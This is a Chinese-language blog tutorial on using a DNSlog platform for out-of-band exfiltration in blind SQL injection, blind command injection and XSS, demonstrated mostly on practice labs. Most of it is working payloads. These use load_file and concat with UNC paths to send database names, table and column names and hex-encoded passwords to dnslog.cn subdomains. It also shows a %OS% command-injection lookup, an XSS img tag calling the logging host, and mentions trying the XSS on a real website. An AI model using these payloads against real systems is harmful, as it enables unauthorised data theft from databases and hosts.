返回顶部

DNSlog平台各种利用姿势(盲注)

题记

       首先祝大家新年快乐,过年给我最大的感觉就是几家欢喜几家愁,我们国家总量看似光鲜,可是平均下来也不多,小老百姓更不容易了,一般没有文化的百姓除了创业就是打工就是中间商赚差价,真是生活不易,加油,一起建设新中国。

       DNSlog我以前是通过看推文了解过,后来零组上架了这么个功能,想着试试,后来发现零组的好像还用不了,还是用别的平台吧,这是可以利用它进行快速盲注的工具,看完大佬们的文章复现完受益良多,get到一个新姿势。玩这个的原因之一也包括我最近在整理sql注入。

靶场环境

       DNSlog平台:http://dnslog.cn

       Sqli-less5:存在布尔盲注漏洞。

       皮卡丘靶场命令执行模块

       真实网站反射型xss

DNSlog简介

       在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。

       DNS的全称是Domain Name System(网络名称系统),它作为将域名和IP地址相互映射,使人更方便地访问互联网。当用户输入某一网址如www.baidu.com,网络上的DNS Server会将该域名解析,并找到对应的真实IP如127.0.0.1,使用户可以访问这台服务器上相应的服务。

       了解到了什么是DNS,那么什么又是DNSlog呢?

       DNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名www.baidu.com等的访问信息,类似日志文件。

       原理:我注册了一个为a.com的域名,我将他a记录泛解析到10.0.0.0上,这样就实现了无论我记录值填什么他都有解析,并且都指向10.0.0.0,当我向dns服务器发起test.a.com的解析请求时,DNSlog中会记录下他给test.a.com解析,解析值为10.0.0.0。(通俗来讲就是我们申请一个dnslog的平台,当我们盲注的时候把想要的数据和平台给的地址拼接起来,dnslog平台就会把请求的记录显示出来。)

常用在哪些情况下:

       1、SQL注入中的盲注

       2、无回显的命令执行

       3、无回显的SSRF

用到的函数

       DNSlog进行注入需要用到load_file()函数,为什么要用load_file函数呢?因为load_file函数可以解析dns请求。

       数据库中使用此payload:select load_file('\\\\SQL注入查询语句.a.com')

       有些地方用Hex编码,编码目的就是减少干扰,因为很多数据库字段的值可能是有特殊符号的,这些特殊符号拼接在域名里是无法做dns查询的,因为域名是有一定的规范,有些特殊符号是不能带入的。

       注意:load_file函数在Linux下是无法用来做dnslog攻击的,因为在这里就涉及到Windows的一个小Tips——UNC路径。

Sqli利用DNSlog进行布尔盲注

       1、打开DNSlog平台,申请一个域名。此时我们申请到h6xj05.dnslog.cn。

       2、打开布尔盲注靶场,http://192.168.1.132:86/Less-5/?id=1为正常页面。加上'报错,可能发现只返回真和假,于是利用DNSlog。

       注意这里的"\"表示转义,后面的ABC可以改成任何字母;sql语句在双引号内不执行,所以要用concat()函数拼接sql语句在双引号内不执行,所以要用concat()函数拼接。

查询数据库名称

       第一条payload: ' and if((select load_file(concat('\\\\',(select database()),'.h6xj05.dnslog.cn\\aaa'))),1,1)--+

       当我们在浏览器输入payload的时候,页面返回正常且DNSlog收到数据库的记录。

       页面执行的语句在数据库中对应的语句为select * from users where id='1' and if((select load_file(concat('\\\\',(select database()),'.h6xj05.dnslog.cn\\aaa'))),1,1)-- ' LIMIT 0,1

查表名

       首先我们看数据库中表名:

       查第一个表的名字:' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.h6xj05.dnslog.cn\\aaa'))),1,1)--+

       查第二个表的名字:' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.h6xj05.dnslog.cn\\aaa'))),1,1)--+

查字段名

       ?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' limit 1,1),'.h6xj05.dnslog.cn\\aaa'))),1,1)--+

       如果查别的字段修改limit后面的值即可。

       做的过程不小心把dnslog刷新了,可以后面域名有所变化,原理是相通的,不影响理解。

查想要的值

       查找users表中password字段的第一个值:?id=1' and if((select load_file(concat('\\\\',(select hex(password) from users limit 0,1),'.licayh.dnslog.cn\\aaa'))),1,1)--+

       查找users表中password字段的第二个值:?id=1' and if((select load_file(concat('\\\\',(select hex(password) from users limit 1,1),'.licayh.dnslog.cn\\aaa'))),1,1)--+

Hex解密

       打开http://ctf.ssleye.com/hex.html

       可以看到解得

       分别对应的数据库中数据。

其他无回显注入

命令注入

       适用于无回显的命令注入点

       使用皮卡丘靶场的命令注入模块实验

       假设该注入点无回显

       查询到了我们输入的变量

       %os%.licayh.dnslog.cn

windows常用变量:

//变量 类型 描述

//%ALLUSERSPROFILE% 本地 返回"所有用户"配置文件的位置。

//%APPDATA%    本地 返回默认情况下应用程序存储数据的位置。

//%CD% 本地 返回当前目录字符串。

//%CMDCMDLINE% 本地 返回用来启动当前的 Cmd.exe 的准确命令行。

//%CMDEXTVERSION% 系统 返回当前的"命令处理程序扩展"的版本号。

//%COMPUTERNAME% 系统 返回计算机的名称。

//%COMSPEC% 系统 返回命令行解释器可执行程序的准确路径。

//%DATE% 系统 返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息,请参阅 Date。

//%ERRORLEVEL% 系统 返回上一条命令的错误代码。通常用非零值表示错误。

//%HOMEDRIVE% 系统 返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在"本地用户和组"中指定的。

//%HOMEPATH% 系统 返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在"本地用户和组"中指定的。

//%HOMESHARE% 系统 返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在"本地用户和组"中指定的。

//%LOGONSERVER% 本地 返回验证当前登录会话的域控制器的名称。

//%NUMBER_OF_PROCESSORS% 系统 指定安装在计算机上的处理器的数目。

//%OS% 系统 返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。

//%PATH% 系统 指定可执行文件的搜索路径。

//%PATHEXT% 系统 返回操作系统认为可执行的文件扩展名的列表。

//%PROCESSOR_ARCHITECTURE% 系统 返回处理器的芯片体系结构。值:x86 或 IA64(基于 Itanium)。

//%PROCESSOR_IDENTFIER% 系统 返回处理器说明。

//%PROCESSOR_LEVEL% 系统 返回计算机上安装的处理器的型号。

//%PROCESSOR_REVISION% 系统 返回处理器的版本号。

//%PROMPT% 本地 返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。

//%RANDOM% 系统 返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。

//%SYSTEMDRIVE% 系统 返回包含 Windows server operating system 根目录(即系统根目录)的驱动器。

//%SYSTEMROOT% 系统 返回 Windows server operating system 根目录的位置。

//%TEMP%和%TMP% 系统和用户 返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP,而其他应用程序则需要 TMP。

//%TIME% 系统 返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息,请参阅 Time。

//%USERDOMAIN% 本地 返回包含用户帐户的域的名称。

//%USERNAME% 本地 返回当前登录的用户的名称。

//%USERPROFILE% 本地 返回当前用户的配置文件的位置。

//%WINDIR% 系统 返回操作系统目录的位置。

xss盲打

       找一个有反射型xss的网站

       注入点插入:<img src="http://licayh.dnslog.cn/aaa">

       收到请求说明触发了插入的js代码

sqlmap使用dns

       sqlmap可以使用--dns-domain参数实现自动化dns注入

参考链接

       渗透测试中dns log的使用(很不错的一篇原理解析文):http://cnblogs.com/rnss/p/11320305.html

       一篇文章理解DNSlog的妙用:http://mp.weixin.qq.com/s/MFKs80OcUdtUKmBO6WBcQA

       Dnslog在SQL注入中的实战(各种数据库全了,有需要可看此处复习):http://anquanke.com/post/id/98096

posted @ 2021-02-12 22:04  11阳光  阅读(1280)  评论(0编辑  收藏  举报